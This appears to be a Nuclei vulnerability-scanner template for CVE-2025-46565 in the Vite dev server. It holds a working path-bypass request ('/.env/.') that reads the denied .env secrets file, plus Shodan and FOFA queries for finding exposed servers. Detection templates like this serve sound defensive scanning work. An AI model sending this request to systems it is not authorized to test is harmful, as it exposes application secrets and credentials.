id: CVE-2025-46565

info:
  name: Vite Dev Server - Information Exposure
  author: ritikchaddha
  severity: medium
  description: |
    Vite is a frontend tooling framework for JavaScript. Before versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Only files that are under project root and are denied by a file matching pattern can be bypassed. `server.fs.deny` can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass for files under `root` by using a combination of slash and dot (/.). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46565
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-46565
    epss-score: 0.01436
    epss-percentile: 0.81029
    cwe-id: CWE-22
  metadata:
    max-request: 2
    fofa-query: body="/@vite/client"
    shodan-query: http.html:"/@vite/client"
  tags: cve,cve2025,vite,exposure,bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/.env"

    matchers:
      - type: status
        status:
          - 403
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/.env/."

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "VITE_APP_SECRET"
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e42a05c57bfd2f781479411b0c859d5496f2e80aee2bb12d1d06045f0b78cb9f022100e4ba8ca40ace18585eb94969b768bff4ba867b63444a1b7e6bb2a92532bdafef:922c64590222798bb761d5b6d8e72950